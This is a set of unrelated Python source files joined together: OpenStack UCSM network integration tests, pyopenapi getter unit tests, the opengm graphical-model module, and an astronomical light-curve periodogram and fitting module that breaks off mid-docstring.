self.assertEqual('ACTIVE', network_obj['status'])
# Create subnet (DHCP enabled)
subnet_obj = self._create_subnet(network_obj)
port_obj = self._create_port(
network_obj['id'], security_groups=[self.security_group['id']])
# Choose random UCSM.
random_ucsm = random.choice(ucsm_list)
random_ucsm_client = self.multi_ucsm_clients[random_ucsm['ucsm_ip']]
random_compute = random.choice(random_ucsm['compute_host_dict'].keys())
vnic_template = random_ucsm['vnic_template_dict'][random_physnet]
server = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj['id'],
availability_zone='nova:' + random_compute)
# Get a vlan id and verify a vlan profile has been created
network = self.admin_networks_client.show_network(network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertNotEmpty,
lambda: random_ucsm_client.get_vlan_profile(vlan_id))
# Verify VLAN is added to vNIC template
self.timed_assert(self.assertNotEmpty, lambda: random_ucsm_client.get_vnic_template_vlan(vnic_template, vlan_id))
# Delete server, port, subnet, network
self.servers_client.delete_server(server['id'])
waiters.wait_for_server_termination(self.servers_client, server['id'])
self.ports_client.delete_port(port_obj['id'])
self.subnets_client.delete_subnet(subnet_obj['id'])
network_obj.delete()
# Verify vlan profile has been removed
self.timed_assert(self.assertEmpty,
lambda: random_ucsm_client.get_vlan_profile(vlan_id))
# Verify VLAN is removed from vNIC template
self.timed_assert(self.assertEmpty, lambda: random_ucsm_client.get_vnic_template_vlan(vnic_template, vlan_id))
@test.attr(type=['non-sriov', 'multi-ucsm', 'vnic-templates'])
def test_multi_vnic_templates_inter_vm_to_vm(self):
"""Covered test cases:
vNIC templates
* Inter VM to VM connectivity
* Instance is able to get IP address from DHCP service
* VLAN profile is not deleted if it used by at least one vNIC Template
"""
self._verify_vnic_templates_configured(need_amount=2)
self._verify_connectivity_tests_enabled()
self._verify_more_than_one_compute_host_exist()
random_physnet = random.choice(CONF.ucsm.physnets)
ucsm_conf1, ucsm_conf2 = random.sample(self.ucsm_confs_with_vnic_templates, 2)
ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
ucsm_client2 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
compute2 = random.choice(ucsm_conf2['compute_host_dict'].keys())
network_kwargs = {'provider:network_type': 'vlan',
'provider:physical_network': random_physnet}
network_obj, subnet_obj, router_obj = self.create_networks(
networks_client=self.admin_networks_client, network_kwargs=network_kwargs)
kwargs = {'security_groups': [self.security_group['id']]}
# Create server #1
port_obj1 = self._create_port(network_obj['id'], **kwargs)
server1 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj1['id'],
availability_zone='nova:' + compute1)
# Create server #2 on another compute
port_obj2 = self._create_port(network_obj['id'], **kwargs)
server2 = self._create_server(
data_utils.rand_name('server-smoke'),
network_obj['id'], port_id=port_obj2['id'],
availability_zone='nova:' + compute2)
self.assert_vm_to_vm_connectivity(server1, server2)
# Delete one server and verify VLAN profile still exists
self.servers_client.delete_server(server1['id'])
waiters.wait_for_server_termination(self.servers_client, server1['id'])
self.ports_client.delete_port(port_obj1['id'])
network = self.admin_networks_client.show_network(
network_obj['id'])['network']
vlan_id = network['provider:segmentation_id']
self.timed_assert(self.assertEmpty,
lambda: ucsm_client1.get_vlan_profile(vlan_id))
# Verify VLAN is still assigned to vNIC template on another UCSM
vnic_template = ucsm_conf1['vnic_template_dict'][random_physnet]
self.timed_assert(self.assertNotEmpty, lambda: ucsm_client2.get_vnic_template_vlan(vnic_template, vlan_id))
self.timed_assert(self.assertNotEmpty,
lambda: ucsm_client2.get_vlan_profile(vlan_id))
    @test.attr(type=['non-sriov', 'multi-ucsm', 'vnic-templates'])
    def test_multi_vnic_templates_intra_vm_to_vm(self):
        """Covered test cases:
        vNIC templates
        * Intra VM to VM connectivity
        * Instance is able to get IP address from DHCP service
        * VLAN is not deleted from vNIC template if it used by at least one neutron port on a compute host
        """
        self._verify_vnic_templates_configured()
        self._verify_connectivity_tests_enabled()
        random_physnet = random.choice(CONF.ucsm.physnets)
        ucsm_conf1 = random.choice(self.ucsm_confs_with_vnic_templates)
        ucsm_client1 = self.multi_ucsm_clients[ucsm_conf1['ucsm_ip']]
        compute1 = random.choice(ucsm_conf1['compute_host_dict'].keys())
        # The physnet pins the network to the vNIC template under test.
        network_kwargs = {'provider:network_type': 'vlan',
                          'provider:physical_network': random_physnet}
        network_obj, subnet_obj, router_obj = self.create_networks(
            networks_client=self.admin_networks_client, network_kwargs=network_kwargs)
        kwargs = {'security_groups': [self.security_group['id']]}
        # Create server #1
        port_obj1 = self._create_port(network_obj['id'], **kwargs)
        server1 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj1['id'],
            availability_zone='nova:' + compute1)
        # Create server #2 on the same compute
        port_obj2 = self._create_port(network_obj['id'], **kwargs)
        server2 = self._create_server(
            data_utils.rand_name('server-smoke'),
            network_obj['id'], port_id=port_obj2['id'],
            availability_zone='nova:' + compute1)
        self.assert_vm_to_vm_connectivity(server1, server2)
        # Delete one server and verify VLAN profile still exists:
        # server2's port keeps the VLAN on the template alive.
        self.servers_client.delete_server(server1['id'])
        waiters.wait_for_server_termination(self.servers_client, server1['id'])
        self.ports_client.delete_port(port_obj1['id'])
        network = self.admin_networks_client.show_network(
            network_obj['id'])['network']
        vlan_id = network['provider:segmentation_id']
        self.timed_assert(self.assertNotEmpty,
                          lambda: ucsm_client1.get_vlan_profile(vlan_id))
        # Verify VLAN is still assigned to vNIC template
        vnic_template = ucsm_conf1['vnic_template_dict'][random_physnet]
        self.timed_assert(self.assertNotEmpty, lambda: ucsm_client1.get_vnic_template_vlan(vnic_template, vlan_id))
| |
# -*- coding: utf-8 -*-
import unittest
import os
import json
from pyopenapi.migration.getter import UrlGetter, DictGetter, SimpleGetter
from pyopenapi.migration.resolve import Resolver
from pyopenapi.utils import compare_container
from ..utils import get_test_data_folder, SampleApp
class _MyCustomException(Exception):
    """Sentinel exception raised by the custom getter callback in tests."""
    pass
def _my_custom_load(_):
    """Loader callback that always raises _MyCustomException.

    Used to prove that SimpleGetter actually invokes
    __simple_getter_callback__; the path argument is ignored.
    """
    raise _MyCustomException('a testing exception')
class _MyCustomGetter(SimpleGetter):
    """Getter whose load callback always raises _MyCustomException."""
    __simple_getter_callback__ = _my_custom_load
class GetterTestCase(unittest.TestCase):
""" test getter """
def test_random_name_v2_0(self):
"""
"""
path = get_test_data_folder(version='2.0', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should not raise ValueError
try:
SampleApp.create(path, to_spec_version='2.0')
except:
self.fail('unable to load random_file_name_v2_0')
raise
def test_random_name_v1_2(self):
"""
"""
path = get_test_data_folder(version='1.2', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should not raise ValueError
try:
SampleApp.create(path, to_spec_version='2.0')
except:
self.fail('unable to load test_random_name_v1_2')
raise
def test_local_path(self):
""" make sure path would be assigned when
passing a getter class
"""
cls = UrlGetter
path = get_test_data_folder(version='2.0', which='random_file_name')
path = os.path.join(path, 'test_random.json')
# should not raise errors
try:
SampleApp.load(path, getter=cls)
except:
self.fail('unable to load test_random_name_v2_0')
raise
def test_dict_getter_v1_2(self):
""" make sure 'DictGetter' works the same as 'LocalGetter'
for Swagger 1.2
"""
#
# loading via DictGetter
#
path = get_test_data_folder(version='1.2', which='wordnik')
path_resource_list = os.path.join(path, 'resource_list.json')
path_pet = os.path.join(path, 'pet.json')
path_store = os.path.join(path, 'store.json')
path_user = os.path.join(path, 'user.json')
with open(path_resource_list, 'r') as handle:
resource_list = json.loads(handle.read())
with open(path_pet, 'r') as handle:
pet = json.loads(handle.read())
with open(path_store, 'r') as handle:
store = json.loads(handle.read())
with open(path_user, 'r') as handle:
user = json.loads(handle.read())
getter = DictGetter(
[
path_resource_list,
path_pet,
path_user,
path_store,
], {
path_resource_list: resource_list,
path_pet: pet,
path_store: store,
path_user: user,
})
app = SampleApp.create(
path,
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
app_default = SampleApp.create(path, to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(compare_container(app.root.dump(), app_default.root.dump())),
[])
#
# different path, mocking an url
#
getter = DictGetter(
[
'http://petstore.com',
'http://petstore.com/pet.json',
'http://petstore.com/user.json',
'http://petstore.com/store.json',
], {
'http://petstore.com': resource_list,
'http://petstore.com/pet.json': pet,
'http://petstore.com/store.json': store,
'http://petstore.com/user.json': user
})
app = SampleApp.create(
'http://petstore.com',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), app_default.root.dump(),
exclude=['$ref'])), [])
#
# provide empty path
#
getter = DictGetter(
[
'',
'pet.json',
'user.json',
'store.json',
], {
'': resource_list,
'pet.json': pet,
'store.json': store,
'user.json': user
})
app = SampleApp.create(
'http://petstore.com',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), app_default.root.dump(),
exclude=['$ref'])), [])
def test_dict_getter_v2_0(self):
""" make sure 'DictGetter' works the same as 'LocalGetter'
for Swagger 2.0
"""
#
# loading via DictGetter
#
path = get_test_data_folder(version='2.0', which='wordnik')
origin_app = SampleApp.create(path, to_spec_version='2.0')
with open(os.path.join(path, 'swagger.json'), 'r') as handle:
spec = json.loads(handle.read())
getter = DictGetter([path], {os.path.join(path, 'swagger.json'): spec})
app = SampleApp.create(
path,
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(compare_container(app.root.dump(), origin_app.root.dump())),
[])
#
# loading via wrong path, should be ok when all internal $ref are not absoluted
#
getter = DictGetter([''], {'': spec})
app = SampleApp.create(
'',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0',
)
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), origin_app.root.dump(), exclude=['$ref'])),
[])
#
# faking http path
#
getter = DictGetter(['https://petstore.com'],
{'https://petstore.com': spec})
app = SampleApp.create(
'https://petstore.com',
resolver=Resolver(default_getter=getter),
to_spec_version='2.0')
# make sure it produce the same App in default way
self.assertEqual(
sorted(
compare_container(
app.root.dump(), origin_app.root.dump(), exclude=['$ref'])),
[])
def test_simple_getter_callback(self):
    """ make sure __simple_getter_callback__ is called """
    folder = get_test_data_folder(version='2.0', which='random_file_name')
    spec_file = os.path.join(folder, 'test_random.json')
    # loading must propagate the specific error raised inside the custom getter
    self.assertRaises(
        _MyCustomException, SampleApp.load, spec_file, getter=_MyCustomGetter)
| |
from _opengmcore import *
from factorSubset import FactorSubset
from gm_injector import _extend_gm_classes
from factor_injector import _extend_factor_classes
from function_injector import _extend_function_type_classes,\
_extend_function_vector_classes,\
isNativeFunctionType,\
isNativeFunctionVectorType
from dtypes import index_type,value_type,label_type
from printing import prettyValueTable
import numpy
# Global OpenGM configuration object exposed by the C++ core.
configuration=OpengmConfiguration()
# Labels and variable indices share the same underlying C++ vector type.
LabelVector=IndexVector
def graphicalModel(numberOfLabels, operator='adder', reserveNumFactorsPerVariable=0):
    """
    Factory function to construct a graphical model.

    Args:
        numberOfLabels : number of label sequence (can be a list or a 1d numpy.ndarray)
        operator : operator of the graphical model. Can be 'adder' or 'multiplier' (default: 'adder')
        reserveNumFactorsPerVariable : hint how many factors to reserve per variable (default: 0)

    Construct a gm with ``\'adder\'`` as operator::
        >>> import opengm
        >>> gm=opengm.graphicalModel([2,2,2,2,2],operator='adder')
        >>> # or just
        >>> gm=opengm.graphicalModel([2,2,2,2,2])

    Construct a gm with ``\'multiplier\'`` as operator::
        gm=opengm.graphicalModel([2,2,2,2,2],operator='multiplier')
    """
    # Normalize the label counts to the dtype the C++ core expects.
    if isinstance(numberOfLabels, numpy.ndarray):
        labelCounts = numpy.require(numberOfLabels, dtype=label_type)
    else:
        labelCounts = numberOfLabels
    if operator == 'adder':
        return adder.GraphicalModel(labelCounts, reserveNumFactorsPerVariable)
    if operator == 'multiplier':
        return multiplier.GraphicalModel(labelCounts, reserveNumFactorsPerVariable)
    raise NameError('operator must be \'adder\' or \'multiplier\'')
# Short alias: ``opengm.gm(...)`` is the same factory as ``opengm.graphicalModel``.
gm = graphicalModel
def movemaker(gm, labels=None):
    """
    Construct a Movemaker matching the operator of the given graphical model.

    Args:
        gm : graphical model (``gm.operator`` is 'adder' or 'multiplier')
        labels : optional starting labeling; if None the Movemaker default is used

    Returns:
        adder.Movemaker or multiplier.Movemaker

    Raises:
        AssertionError : if ``gm.operator`` is neither 'adder' nor 'multiplier'
    """
    if gm.operator == 'adder':
        if labels is None:
            return adder.Movemaker(gm)
        else:
            return adder.Movemaker(gm, labels)
    elif gm.operator == 'multiplier':
        if labels is None:
            return multiplier.Movemaker(gm)
        else:
            return multiplier.Movemaker(gm, labels)
    else:
        # BUG FIX: was ``assert false`` -- ``false`` is an undefined name, so
        # this branch raised NameError instead of a meaningful assertion.
        assert False, "gm.operator must be 'adder' or 'multiplier'"
def shapeWalker(shape):
    """
    generator obect to iterate over a multi-dimensional factor / value table

    Args:
        shape : shape of the factor / value table

    Yields:
        coordinate as list of integers; the first axis varies fastest, and a
        fresh list is yielded on every step.

    Example: ::
        >>> import opengm
        >>> import numpy
        >>> # some graphical model
        >>> # -with 2 variables with 2 labels.
        >>> # -with 1 2-order functions
        >>> # -connected to 1 factor
        >>> gm=opengm.gm([2]*2)
        >>> f=opengm.PottsFunction(shape=[2,2],valueEqual=0.0,valueNotEqual=1.0)
        >>> int(gm.addFactor(gm.addFunction(f),[0,1]))
        0
        >>> # iterate over all factors of the graphical model
        >>> # (= 1 factor in this example)
        >>> for factor in gm.factors():
        ...     # iterate over all labelings with a "shape walker"
        ...     for coord in opengm.shapeWalker(f.shape):
        ...         print "f[%s]=%.1f" %(str(coord),factor[coord])
        f[[0, 0]]=0.0
        f[[1, 0]]=1.0
        f[[0, 1]]=1.0
        f[[1, 1]]=0.0

    Note :
        Works for any dimension >= 1 (the previous implementation was a
        hand-unrolled loop nest limited to dimension <= 10).
    """
    import itertools
    if len(shape) == 0:
        raise TypeError("shapeWalker is only implemented for len(shape)>=1 ")
    # itertools.product varies the *last* axis fastest while this generator's
    # contract is "first axis fastest" -- so feed it the reversed shape and
    # flip each produced coordinate back.
    for coord in itertools.product(*(range(s) for s in reversed(shape))):
        yield list(coord[::-1])
class Adder:
    """Semi-ring tag class for the '+' operator."""

    def neutral(self):
        """Return the neutral element of addition (0.0)."""
        return 0.0
class Multiplier:
    """Semi-ring tag class for the '*' operator."""

    def neutral(self):
        """Return the neutral element of multiplication (1.0)."""
        return 1.0
def modelViewFunction(factor):
    """Wrap ``factor`` as a PythonFunction that views the factor's value table."""
    def _view(labeling):
        # evaluate the wrapped factor at the given labeling
        return factor[labeling]
    return PythonFunction(_view, factor.shape.__tuple__())
def gridVisNh4(shape, numpyOrder=True):
    """Variable-index pairs of all 4-neighborhood factors on a 2d grid.

    Returns an ``(nFactors, 2)`` index array filled in by the C++ helper
    ``secondOrderGridVisNew``.
    """
    horizontalFactors = (shape[0] - 1) * shape[1]
    verticalFactors = (shape[1] - 1) * shape[0]
    vis = numpy.zeros(shape=[horizontalFactors + verticalFactors, 2],
                      dtype=index_type)
    secondOrderGridVisNew(shape[0], shape[1], numpyOrder, vis)
    return vis
#Model generators
def grid2d2Order(unaries,regularizer,order='numpy',operator='adder'):
    """
    returns a 2d-order model on a 2d grid (image).
    The regularizer is the same for all 2.-order functions.

    Keyword arguments:
    unaries -- unaries as 3d numy array where the last dimension iterates over the labels
    regularizer -- second order regularizer
    order -- order how to compute a scalar index from (x,y) (default: 'numpy')
    operator -- operator of the graphical model (default: 'adder')

    Example : ::
        >>> import opengm
        >>> import numpy
        >>> unaries=numpy.random.rand(10, 10,2)
        >>> gridGm=opengm.grid2d2Order(unaries=unaries,regularizer=opengm.pottsFunction([2,2],0.0,0.4))
        >>> int(gridGm.numberOfVariables)
        100
    """
    shape=unaries.shape
    assert(len(shape)==3)
    numLabels=shape[2]
    numVar=shape[0]*shape[1]
    # horizontal + vertical pairwise factors plus one unary factor per variable
    numFactors=(shape[0]-1)*shape[1] + (shape[1]-1)*shape[0] +numVar
    numberOfLabels=numpy.ones(numVar,dtype=numpy.uint64)*numLabels
    gm=graphicalModel(numberOfLabels,operator=operator)
    # reserve space up front so repeated adds do not reallocate
    gm.reserveFunctions(numVar+1,'explicit')
    gm.reserveFactors(numFactors)
    # add unaries: flatten the image so each pixel is one row of label values
    unaries2d=unaries.reshape([numVar,numLabels])
    gm.addFactors( gm.addFunctions(unaries2d),numpy.arange(0,numVar,dtype=numpy.uint64),finalize=False)
    # add 2-order function: one shared regularizer attached to every grid edge
    vis2Order=secondOrderGridVis(shape[0],shape[1],bool(order=='numpy'))
    fid2Order=gm.addFunction(regularizer)
    fids=FidVector()
    fids.append(fid2Order)
    gm.addFactors(fids,vis2Order,finalize=False)
    # factors were added with finalize=False -> one final finalize pass
    gm.finalize()
    return gm
def grid3d2Order(unaries,regularizer,order='numpy',operator='adder'):
    """
    returns a 2d-order model on a 3d grid (volume).
    The regularizer is the same for all 2.-order functions.

    Keyword arguments:
    unaries -- unaries as 4d numpy array where the last dimension iterates over the labels
    regularizer -- second order regularizer
    order -- order how to compute a scalar index from (x,y,z) (default: 'numpy')
    operator -- operator of the graphical model (default: 'adder')

    Example : ::
        >>> import opengm
        >>> import numpy
        >>> unaries=numpy.random.rand(10, 10, 10, 2)
        >>> gridGm=opengm.grid3d2Order(unaries=unaries,regularizer=opengm.pottsFunction([2,2],0.0,0.4))
        >>> int(gridGm.numberOfVariables)
        1000
    """
    shape=unaries.shape
    assert len(shape) == 4
    numLabels=shape[-1]
    numVar=shape[0]*shape[1]*shape[2]
    numberOfLabels=numpy.ones(numVar,dtype=numpy.uint64)*numLabels
    gm=graphicalModel(numberOfLabels,operator=operator)
    # add unaries: flatten the volume so each voxel is one row of label values
    unaries3d=unaries.reshape([numVar,numLabels])
    gm.addFactors( gm.addFunctions(unaries3d),
                   numpy.arange(0,numVar,dtype=numpy.uint64),finalize=False)
    # add 2-order function: one shared regularizer attached to every grid edge
    vis2Order=secondOrderGridVis3D(shape[0], shape[1], shape[2],
                                   bool(order=='numpy'))
    fid2Order=gm.addFunction(regularizer)
    fids=FidVector()
    fids.append(fid2Order)
    gm.addFactors(fids,vis2Order,finalize=False)
    # factors were added with finalize=False -> one final finalize pass
    gm.finalize()
    return gm
def pottsModel3d(unaries, regularizer, order='numpy', operator='adder'):
    """Construct a 3d Potts model via the C++ helper.

    Args:
        unaries : per-voxel unary values (coerced to value_type and squeezed)
        regularizer : regularizer values (coerced to value_type and squeezed)
        order : 'numpy' selects numpy (C) index order
        operator : 'adder' or 'multiplier' (anything non-'adder' uses multiplier)
    """
    unaries = numpy.require(unaries, dtype=value_type).squeeze()
    regularizer = numpy.require(regularizer, dtype=value_type).squeeze()
    if operator == 'adder':
        factory = adder._pottsModel3d
    else:
        factory = multiplier._pottsModel3d
    # BUG FIX: removed leftover debug ``print`` statements that dumped the
    # input shapes to stdout on every call.
    gm = factory(unaries, regularizer, order == 'numpy')
    return gm
def pottsModel3dMasked(unaries, regularizer, mask, operator='adder'):
    """Construct a masked 3d Potts model via the C++ helper.

    Voxel-to-variable mapping is produced by the C++ side into a scratch
    buffer sized like ``mask``.
    """
    unaries = numpy.require(unaries, dtype=value_type).squeeze()
    regularizer = numpy.require(regularizer, dtype=value_type).squeeze()
    if operator == 'adder':
        factory = adder._pottsModel3dMasked
    else:
        factory = multiplier._pottsModel3dMasked
    # scratch buffer filled by the C++ helper (voxel index -> variable index)
    idx2vi = numpy.zeros(mask.size, dtype=numpy.uint32)
    gm = factory(unaries, regularizer, mask, idx2vi)
    return gm
def makeMaskedState(mask, arg, labelIdx):
    """
    maps gm result to 3d volume coords

    mask : mask image
    arg : result of gm inference
    labelIdx : value that will be assigned to masked region
    """
    volumeArg = numpy.zeros(mask.shape, dtype=numpy.uint32)
    # the C++ helper fills volumeArg in place
    _opengmcore._makeMaskedState(mask, arg, volumeArg, labelIdx)
    return volumeArg
def getStartingPointMasked(imgArg, mask, maskIdx=1):
    """
    maps 3d starting points to gm indices
    """
    # one entry per voxel whose mask value equals maskIdx
    startingPoints = numpy.zeros(mask[mask == maskIdx].shape, dtype=numpy.uint32)
    # the C++ helper fills startingPoints in place
    _opengmcore._getStartingPointMasked(mask, imgArg, startingPoints)
    return startingPoints.astype(label_type)
# the following is to enable doctests of pure boost::python classes
# if there is a smarter way, let me know
_GmAdder = adder.GraphicalModel
_GmMultiplier = multiplier.GraphicalModel
_FactorAdder = adder.Factor
_FactorMultiplier = multiplier.Factor
_ExplicitFunction = ExplicitFunction
_SparseFunction = SparseFunction
_TruncatedAbsoluteDifferenceFunction = TruncatedAbsoluteDifferenceFunction
_TruncatedSquaredDifferenceFunction = TruncatedSquaredDifferenceFunction
_PottsFunction = PottsFunction
_PottsNFunction = PottsNFunction
_PottsGFunction = PottsGFunction
_PythonFunction = PythonFunction
_FactorSubset = FactorSubset
# monkey-patch extra pythonic convenience methods onto the boost::python classes
_extend_gm_classes()
_extend_factor_classes()
_extend_function_type_classes()
_extend_function_vector_classes()
if __name__ == "__main__":
    # run the doctests embedded in this module's docstrings
    import doctest
    import opengm
    doctest.testmod()
    #raise RuntimeError(" error")
    #doctest.run_docstring_examples(opengm.adder.GraphicalModel.addFactor, globals())
| |
# coding=utf-8
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# see https://wiki.python.org/moin/PortingToPy3k/BilingualQuickRef
from os.path import join
import numpy as np
from astropy.table import Table
from astropy.modeling import models, fitting
from astropy.stats import sigma_clipped_stats, sigma_clip
from astwro.exttools import Runner
from astwro.phot.lc_io import write_lc, write_lc_filters
class LCFitter(object):
    """
    Abstract Light Curve Fitter

    Base class for light curve fitters used by `FNpeaksResult.makefit`

    Parameters
    ----------
    clipping_sigma: float
        Sigma clipping to this of light curve before fitting
    """
    def __init__(self, clipping_sigma=None):
        self.clipping_sigma = clipping_sigma
        self.fit = None  # fitted model; set by concrete dofit() implementations

    def __call__(self, *args, **kwargs):
        """
        Call underlying model
        """
        return self.fit(*args, **kwargs)

    def dofit(self, freq, hjd, lc, lc_e=None):
        """
        Performs model fit to light curve

        Dummy abstract method to be overridden

        Parameters
        ----------
        freq: float
            Frequency found by FNpeaks, fixed model parameter.
        hjd : array-like
            N-element time axis
        lc : array-like
            N-element measurements on points on `hjd` time moments
        lc_e : array-like
            N-element optional errors of measurements `lc`

        Returns
        -------
        Touple clipped_hjd, fitted_model
        """
        # BUG FIX: removed the unreachable ``return None, self`` that
        # followed this raise.
        raise NotImplementedError('Abstract LCFitter.fit method called')
class SineFitter(LCFitter):
    """Fit ``A sin(2*pi*f*t + phi)`` to a mean-subtracted light curve."""

    def __init__(self, clipping_sigma=None):
        super(SineFitter, self).__init__(clipping_sigma)
        self.fit = None
        self.frequency = None
        self.amplitude = None
        self.phase = None

    def dofit(self, freq, hjd, lc, lc_e=None):
        # fixed-frequency sine model, fitted with sigma-clipping outlier removal
        model = models.Sine1D(frequency=freq)
        model.frequency.fixed = True
        outlier_fitter = fitting.FittingWithOutlierRemoval(
            fitting.LevMarLSQFitter(), sigma_clip, sigma=self.clipping_sigma)
        # subtract the (sigma-clipped) mean so the sine is fitted around zero
        centered_lc = lc - sigma_clipped_stats(lc)[0]
        clipped, fitted = outlier_fitter(model, hjd, centered_lc)
        self.fit = fitted
        self.frequency = fitted.frequency
        self.amplitude = fitted.amplitude
        self.phase = fitted.phase
        return clipped, self
class SineFitterC(LCFitter):
    """Fit ``A sin(2*pi*f*t + phi) + mag`` (sine plus constant offset)."""

    def __init__(self, clipping_sigma=None):
        super(SineFitterC, self).__init__(clipping_sigma)
        self.fit = None
        self.frequency = None
        self.amplitude = None
        self.phase = None
        self.mag = None

    def dofit(self, freq, hjd, lc, lc_e=None):
        # sine + constant offset; only the frequency is held fixed
        model = models.Sine1D(frequency=freq) + models.Const1D(0)
        model.frequency_0.fixed = True
        outlier_fitter = fitting.FittingWithOutlierRemoval(
            fitting.LevMarLSQFitter(), sigma_clip, sigma=self.clipping_sigma)
        clipped, fitted = outlier_fitter(model, hjd, lc)
        self.fit = fitted
        # compound-model parameters are suffixed by sub-model index:
        # _0 = sine, _1 = constant
        self.frequency = fitted.frequency_0
        self.amplitude = fitted.amplitude_0
        self.phase = fitted.phase_0
        self.mag = fitted.amplitude_1
        return clipped, self
class SineHarmonicFitterC(LCFitter):
    """Fit ``SUM_i A_i sin(2*pi*f*i*t + phi_i) + mag`` for minn..maxn harmonics.

    Models with an increasing number of harmonics are fitted in turn; the
    fit with ``maxn`` harmonics is the one that is kept.
    """

    def __init__(self, clipping_sigma=None, minn=1, maxn=6):
        super(SineHarmonicFitterC, self).__init__(clipping_sigma)
        self.fit = None
        self.frequency = None
        self.amplitude = None
        self.phase = None
        self.mag = None
        self.minn = minn  # smallest number of harmonics to try
        self.maxn = maxn  # largest number of harmonics (this fit is kept)

    def dofit(self, freq, hjd, lc, lc_e=None):
        inner_fitter = fitting.LevMarLSQFitter()
        fitter = fitting.FittingWithOutlierRemoval(inner_fitter, sigma_clip, sigma=self.clipping_sigma)
        ret_clipped = None
        for n in range(self.minn, self.maxn + 1):
            model = models.Const1D(0)
            for i in range(1, n + 1):  # add i harmonics to model
                model_s = models.Sine1D(frequency=freq * i, amplitude=0)
                model_s.frequency.fixed = True
                model = model + model_s
            clipped, fit = fitter(model, hjd, lc)
            if ret_clipped is None:
                ret_clipped = clipped  # return first clipping not harmonics clipping
            # BUG FIX: removed a leftover debug ``print`` of the residual
            # std-dev (the residual was computed but never used for model
            # selection -- the maxn-harmonics fit is always the one kept).
        self.fit = fit
        self.frequency = fit.frequency_1
        self.amplitude = fit.amplitude_1
        self.phase = fit.phase_1
        self.mag = fit.amplitude_0
        return ret_clipped, self
class Peak(object):
    """
    Peak description.

    Parameters
    ----------
    freq : float
    period : float
    power : float
    sn : float
        Signal to noise of peak
    """

    def __init__(self, freq, period, power, sn):
        # plain value container; attributes mirror the constructor arguments
        self.freq, self.period = freq, period
        self.power, self.sn = power, sn
class FNpeaksResult(object):
    """
    Results of fnpeak call.

    Returned by `~astwro.timeseries.FNpeaks`.

    Attributes
    ----------
    power : `~numpy.ndarray`
        Power of signal in frequencies, use `~astwro.timeseries.FNpeaks.freq` method for i-th frequency
    peaks : list of `~astwro.timeseries.Peak`
        List of most prominent peaks returned by fnpeaks (*.max file)
        notes).
    """
    def __init__(self):
        self.power = None            # periodogram power values (optional)
        self.peaks = None            # table of peaks parsed from the *.max file
        self.lc = None               # light curve values
        self.lc_e = None             # light curve errors (optional)
        self.hjd = None              # time axis
        self.freq_range = (0.0, 0.0) # (start, end) frequency of the scan
        self.freq_step = 0.0         # frequency step of the scan
        self.fit = None              # fitted model, set by makefit()
        self.lc_clipped = None       # sigma-clipped light curve used for the fit

    @property
    def frequencies(self):
        """Frequency grid of the scan."""
        return np.arange(self.freq_range[0], self.freq_range[1], self.freq_step)

    @property
    def periods(self):
        """Period grid of the scan (element-wise inverse of `frequencies`)."""
        # reuse `frequencies` instead of rebuilding an identical arange
        return 1.0 / self.frequencies

    @property
    def lc_reduced(self):
        """Light curve with the fitted model subtracted (fits on demand)."""
        if self.fit is None:
            self.makefit()
        return self.lc_clipped - self.fit(self.hjd)

    def makefit(self, freq=None, peak=0, clipping_sigma=3.0, fitter_class=SineHarmonicFitterC, **kwargs):
        """Fit `fitter_class` at `freq` (default: frequency of peak number `peak`)."""
        if freq is None:
            freq = self.peaks[peak]['freq']
        fitter = fitter_class(clipping_sigma, **kwargs)
        self.lc_clipped, self.fit = fitter.dofit(freq, self.hjd, self.lc, self.lc_e)
        return self.fit
    # NOTE: a commented-out older version of makefit was removed here.
class FNpeaks(Runner):
    """
    `fnpeaks` runner

    Object of this class maintains single process of `fnpeaks` and it's working directory.

    Parameters
    ----------
    hjd : `~numpy.ndarray`
        Heliocentric julian days for observations (second dimension of lc)
    lc : `~numpy.ndarray`
        2D NxM array-like with light curves. N stars, M observations
    lc_e : `~numpy.ndarray`, optional
        Standart deviations of `lc`
    filtermasks : dict, optional
        Keys are filters, values are boolean masks for second dimension of `lc` with masks of filter
    start_freq : float
        Start frequency to scan (1/day)
    end_freq : float
        End frequency to scan (1/day)
    step_freq : float
        Frequency step
    ids : array-like:
        1D N element array with numerical ids of stars for filenames generation
    dir : str, optional
        Path of directory used for fnpeaks input output. If not provided temporary dir will be used
        and deleted on destructor.
    """
    def __init__(self, hjd, lc, lc_e=None, filtermasks=None,
                 start_freq=0.0001, end_freq=40.0001, step_freq=0.0001,
                 ids=None, dir=None):
        super(FNpeaks, self).__init__(dir=dir)
        self.hjd = hjd
        # normalize light curves (and errors) to 2D: one row per star
        if lc.ndim == 1:
            self.lc = lc.reshape((1, lc.size))
        else:
            self.lc = lc
        if lc_e is not None and lc_e.ndim == 1:
            self.lc_e = lc_e.reshape((1, lc_e.size))
        else:
            self.lc_e = lc_e
        self.filtermasks = filtermasks
        # BUG FIX: start_freq was assigned twice; redundant assignment removed
        self.start_freq = start_freq
        self.end_freq = end_freq
        self.step_freq = step_freq
        self.ids = ids
        self._update_executable('fnpeaks')

    def __call__(self, star, filter=None, periodogram=False, error_max=None, sigmaclip=None):
        """
        Runs fnpeaks for specified star(s)

        Parameters
        ----------
        star : long or array-like
            Stars(s) to process, position index in `~astwro.timeseries.FNpeaks.lc`
        filter : list of str
            If `~astwro.timeseries.FNpeaks.filtermasks` specified, selects filters. None means: all filters.
        periodogram : bool
